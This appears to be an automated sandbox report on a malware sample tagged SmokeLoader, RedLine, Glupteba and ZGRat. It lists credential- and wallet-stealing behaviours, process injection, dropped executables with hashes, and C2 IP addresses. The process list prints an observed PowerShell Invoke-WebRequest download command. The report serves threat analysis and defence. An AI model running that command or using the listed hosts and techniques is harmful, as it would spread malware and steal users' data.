Malware Analysis Report

2025-03-15 05:17

Sample ID 231218-w9y9cadgc5
Target 0x0031000000014721-451.dat
SHA256 bd13bca1138353850c1d0ebe674f2092d83ed95e2d83aaf7aeedd38ff3717d23
Tags
smokeloader redline livetraffic backdoor infostealer trojan glupteba zgrat 666 up3 discovery dropper loader rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bd13bca1138353850c1d0ebe674f2092d83ed95e2d83aaf7aeedd38ff3717d23

Threat Level: Known bad

The file 0x0031000000014721-451.dat was found to be: Known bad.

Malicious Activity Summary

smokeloader redline livetraffic backdoor infostealer trojan glupteba zgrat 666 up3 discovery dropper loader rat spyware stealer

ZGRat

RedLine

Detect ZGRat V1

Glupteba

Smokeloader family

RedLine payload

Glupteba payload

SmokeLoader

Downloads MZ/PE file

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Deletes itself

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Unsigned PE

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 18:37

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 18:37

Reported

2023-12-18 18:40

Platform

win7-20231215-en

Max time kernel

28s

Max time network

76s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe

"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"

C:\Users\Admin\AppData\Local\Temp\624C.exe

C:\Users\Admin\AppData\Local\Temp\624C.exe

C:\Users\Admin\AppData\Local\Temp\7698.exe

C:\Users\Admin\AppData\Local\Temp\7698.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp" /SL5="$9011E,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\7DF8.exe

C:\Users\Admin\AppData\Local\Temp\7DF8.exe

Network

Country Destination Domain Proto
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
RU 5.42.65.125:80 5.42.65.125 tcp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp
BG 91.92.254.7:80 tcp
US 64.185.227.156:80 tcp

Files

memory/3032-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3032-2-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1212-1-0x0000000002D90000-0x0000000002DA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\624C.exe

MD5 1628c4ac16c9fd4e60d6eefcfd0ca1f2
SHA1 362aec5a747ed3b99996fdc972cb51a72f818689
SHA256 8df146244d8f1677c82c8a4414b504c3c9a329caf69218fd53c507b12f8da4d1
SHA512 afec20745144619d3b6e1581e77066f2426376b494545dde68c4c54c787d9f7df8e8c56bca56d1d12b317e7d131d41abd357004560df33a7a5249a07762358ba

C:\Users\Admin\AppData\Local\Temp\624C.exe

MD5 a8c45021e6ee96ad127bf25eebbfedce
SHA1 5a103eba454730a01163f3d2428e2ce58ddf6168
SHA256 7e894d180dbbad9f65b50616c1bc58187a0d9a24dc6b4f0e9b54a1f2500eff37
SHA512 7744e358272aebc99fb923ed68b7a0ff454cc703e9d2490c11ad1d744f8856088cbf84b2eb236f89f0475804b241b8e5f401cad37be275183be245fc1494d2b1

memory/2084-14-0x0000000000160000-0x00000000001B2000-memory.dmp

memory/2084-19-0x0000000074B80000-0x000000007526E000-memory.dmp

memory/2084-20-0x0000000004F50000-0x0000000004F90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7698.exe

MD5 b3eeb284533de706d1e39562e5942a79
SHA1 8ec197e20c89179ce3678542d8ed07a0bac57db2
SHA256 79dc01a0e266231b5506cc53471e1bfc3f55f5f822887bd8d816c6d35c2987a9
SHA512 36cc734e7ff565f803001b055f4628303ff9498af6e266da71547602a112ba55a665b3257c1956c81c550503f913892acae074784d833d9b26d6a0bb7472c0a0

C:\Users\Admin\AppData\Local\Temp\7698.exe

MD5 3306bb02d2aabd9a9bfe1e8aa818c928
SHA1 0549c179379986e1da422068fba02c83e254203b
SHA256 dace15ac43d36c47b1004b095735004aa3c49889150cfae6188310bbf847b923
SHA512 aebae65fda2f3e0436998fb74ca2817468e798ee061a6a514328ef67bb88c3cac6ead4857d4df5447982f401266e52b2b7e7ad725519412f728ce16b7f026298

memory/2772-27-0x0000000074B80000-0x000000007526E000-memory.dmp

memory/2772-28-0x00000000003B0000-0x00000000011A2000-memory.dmp

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 ab888f57379c9057ec94a73a5d4349a5
SHA1 3fec7dba1d5ea81db05750982cef21d29ce4fa1e
SHA256 204c59c9ed4cb80b17ec80a394f59759fe67994fb3e67ef88a763ff7362ecd05
SHA512 1907056136e4143e6bd1e3c8a433b4789d276f8c5dd4279b19323be8cba647227aaf92c5f6a106724a006261ad6edc5ec305cc74a0765422549df200d278fe2c

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 174caa766705bbb082dfa30456d19f64
SHA1 357925425b7f47e99703eecd2872f0f59049362f
SHA256 d4b6605b07ac8e62fae56fbda1a8cf7a706fe6c839e0ea95aee1e52d69ca97d2
SHA512 edc7ff3bfc5bc6c9bfe4224e8fd8185e2b015240a2914193537ed2b1108867805dfc401c9c618c275603d1daf37dcdf22177e9a792eb6b209d665c5e8bfb75ec

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 a98f6155e05cdc4398d2b3d0365b5a28
SHA1 8bc35073fde1405157a5343b7714fbed1b63188a
SHA256 47c421bad8acc2658e9d1c52995b50441b186aadc9137ac479df7c61169bb750
SHA512 e73c48f9c392b9ec7b965f67099392dae9ce77e88176d385bfed6bdf496b9dae4784ba186d3bae62f66588a4d3720ca68446014cc86f758275a1f6812288bad4

\Users\Admin\AppData\Local\Temp\nsd77B0.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

memory/2016-58-0x0000000002680000-0x0000000002A78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 857aa3af511550939ad23672ca2b224e
SHA1 ee9c9bf95ab211b984096067562bcbd0ca2c82d8
SHA256 7e6df4f2a364f3e3c6b1a26a84a423f0f88c559f76053cd2694a93fae47e0fbf
SHA512 e203093d98fcb4aa46ffa9201cbde37c786faa2ace76eec957bd01e3b3c79d22ab7149e7e0e54f8238da8205258cd5ea452db04a4d140edf033b3530d93f36ff

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 9643eb2f7eda63e52e5a60ccd1aea256
SHA1 29c45961f81e94335da5e46574039c64aad22131
SHA256 e7b364a898b373a029e41066f1a26f8269be239a0acea25e3626989b4931d683
SHA512 332d2a6aa31e2bf08ebf49c6372c3fa17c7aca9918ba113b4eb51a49e198e4e632ef8379f1848738f5dfbd22659b4404f5000dac3e1e542760c169d15d3eca22

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 46caf6b0b64506200e5ffd7041ce660f
SHA1 79c5657532c534b174c71f224655df47d3cbd919
SHA256 333b469824d914c162ab3818260d1bd49de8119d6849b69df71cda88ca35a565
SHA512 bda2e364445fb4a446fda0b59e32b4a6bbce07c87b8bc11727551d5b3adf453586ab75b5350dd7b3c2cfd48f3a2cd9ad42de798e23dd15f4102f7ac1dade110a

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 e44770a5b7f40d91cb4c08244a7a256c
SHA1 27ddf7042c48857f1e3d1ddcc767d3fd7c90f25e
SHA256 811b13ba8f0100d5edc178d46d9f02b9a99509694c13b5c762752f1e148d3c89
SHA512 d338448675725972d137bdd538e91879e0365eb31974a7b3fe62af70f12c629dd6c6e2ef3805d18ec123c2acb1dfe4e896b22c5f93cf2dda74b751afd8c1ef98

memory/2772-69-0x0000000074B80000-0x000000007526E000-memory.dmp

memory/1332-68-0x0000000000400000-0x0000000000418000-memory.dmp

\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 30cd9f0f501e42d2b2c633d09b0add80
SHA1 9e14624ff630dc3c97b9cbf7b7d680c70abcc1a5
SHA256 2577d1c2e4f276f4e93fc4f4c26492a439adaa756028ab2490d5d4d5ddfd9e1a
SHA512 5a2a82039de2a3e7159a4b0de2965d4613c3b626274289f542926dd4f6fc0a90d6a1a9fc50810ed54161a22a0383c54eb2f57a5186dc6e24d160d42675b44717

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 bbef2475688a65343f8f453bad9d0395
SHA1 8a0768b76b0f96e5029da243d7f6ae9e7b076ab4
SHA256 63ea7a4254b4c816a1024713afbaef6487bdf13941740222b2ab34224d147e5b
SHA512 b64aef5a53f12e1ae3ebf1ee960de0b4d5624af9696c8d597d59a658d85044cb457e3334fffbf29817d82e74c7475b2262469a39d83b488a40696bf2806a7078

memory/2016-71-0x0000000002680000-0x0000000002A78000-memory.dmp

memory/2016-73-0x0000000002A80000-0x000000000336B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 c104d059ac2795e96636c3215ce2275e
SHA1 201a2ac1a95d771320e6a8cf676004962fd26e75
SHA256 fe09443103ec4cbb314be81394f4634d4d8000efaa48714148431a3f90750906
SHA512 c58d56a7625eab84c11dcd82ddbb9e92941036469e0fad9dc08d95ab610fcc108f4bfd60ec1306cf8fd9e605092cf74918c64ac8a4570fe36fa72094136cb0d3

\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 0a90f231fcfede6e071cfa5e88b244f7
SHA1 161954936f6bef19c895d6798a9ebc1e36eb8d5f
SHA256 79ea00cd8c63517f97df7948f4ecd1ee2a9b675d3e5af787ee27fab78abe576e
SHA512 0f9ce57279ce81200514c843038b640c4a2138badf12a57651360a906dab9f3ee4c6e3b4473a2eebc4e819db587ef217fd49d5871d1607f8609e8b1942d7c171

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 397bd9efec644db61e4764ba5cacb749
SHA1 dd586711e8f17e2f853360da174934d500b341f1
SHA256 9a628170aaeb05856e58480ef9a7827ac1a2e1775b164fd3acb93b4a055c218e
SHA512 42fe49140ef7ff2fd67620c06a53b4b7c8a9c0a05206b566c0a9f342624d1a70dbe7c7ac518ade448bd91881d600ec0ec5d806c81e26720f6c9e4d1df01ecd74

memory/2016-87-0x0000000000400000-0x0000000000D1C000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/2188-103-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2908-114-0x0000000000240000-0x0000000000241000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_isdecmp.dll

MD5 3adaa386b671c2df3bae5b39dc093008
SHA1 067cf95fbdb922d81db58432c46930f86d23dded
SHA256 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38
SHA512 bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303

\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\??\c:\users\admin\appdata\local\temp\is-nlvck.tmp\tuc3.tmp

MD5 0f512e7e71a73563a86f7da8ca8022a7
SHA1 b7eff07b2aac336e1d8f755f806005c22561ac86
SHA256 628e8a1bf0c16e97d84ccc3309786a0f4d5aba46893825e12aee6c1c582c6d69
SHA512 823db9dde7df4e5d4f4baff4facaa1be79412bf0a2acd3e9885507599c8a7a75728eda9fe4b90c000881b8a656428a6461b26e52d198de388d45e92cecd11319

C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp

MD5 b3fae67141280b66be24d8e960b48263
SHA1 4e18d90912568b09f4ae03006c80f4e591dd528b
SHA256 ea2b9a05672b85405c86532abd8f1ad97f39020d02b094a0ebb6c7a4b2bf95c6
SHA512 1f0b67c557e22f721b7bdd71343f900cb10a401df6be5a67a21f212c14e652e8a0a1afdb7c57a327b1cf5a464166c8d1c60d4fdf417acf71da863fb54b069545

\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp

MD5 6045f66424564f5dba00cedb688e7fa7
SHA1 ad441a2c48880eaf398d4e1fe9409223b89265f6
SHA256 c410fa72fecadc8db0439a87014640853a152a5e5268528b80a7feadd919e21d
SHA512 a4a6d3e9111596eb8dffff6c54ca9ad3fe91e49397319a2f26ed02440f185c7a96fba35bcd45ed05a679d250392d8a49999385aae65dd3248bb8583d65ecf497

\Users\Admin\AppData\Local\Temp\nsd77B0.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 48f3709376715226b10f39ca25a17b47
SHA1 7d12464c646314f7d6530d1a485521dbecb176df
SHA256 01902b0ae74c0cb8b31fb8c3145eaed642704e4c82c8b7d63d873936dfd7f6b4
SHA512 6ca7e610e4c1efda0514587aa3c49d3045b600d3a0d446c30fb767cfe3c3c0e47e147e47d61dc88102cb9a5551c02fa214c3bd578def42d4636566f1ac137bbd

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 18:37

Reported

2023-12-18 18:40

Platform

win10v2004-20231215-en

Max time kernel

43s

Max time network

84s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F4B0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4440 set thread context of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\F4B0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3540 wrote to memory of 3628 N/A N/A C:\Users\Admin\AppData\Local\Temp\F4B0.exe
PID 3540 wrote to memory of 3628 N/A N/A C:\Users\Admin\AppData\Local\Temp\F4B0.exe
PID 3540 wrote to memory of 3628 N/A N/A C:\Users\Admin\AppData\Local\Temp\F4B0.exe
PID 3540 wrote to memory of 4440 N/A N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe
PID 3540 wrote to memory of 4440 N/A N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe
PID 3540 wrote to memory of 4440 N/A N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe
PID 4440 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4440 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4440 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4440 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4440 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4440 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4440 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4440 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6C2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe

"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"

C:\Users\Admin\AppData\Local\Temp\F4B0.exe

C:\Users\Admin\AppData\Local\Temp\F4B0.exe

C:\Users\Admin\AppData\Local\Temp\6C2.exe

C:\Users\Admin\AppData\Local\Temp\6C2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\412D.exe

C:\Users\Admin\AppData\Local\Temp\412D.exe

C:\Users\Admin\AppData\Local\Temp\48FE.exe

C:\Users\Admin\AppData\Local\Temp\48FE.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c install.bat

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp" /SL5="$C002E,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\nsh63E8.tmp.exe

C:\Users\Admin\AppData\Local\Temp\nsh63E8.tmp.exe

C:\Users\Admin\AppData\Local\Temp\6ACF.exe

C:\Users\Admin\AppData\Local\Temp\6ACF.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 68.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 54.231.229.1:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 1.229.231.54.in-addr.arpa udp
RU 5.42.65.125:80 5.42.65.125 tcp
US 8.8.8.8:53 125.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
RU 77.105.132.87:17066 tcp
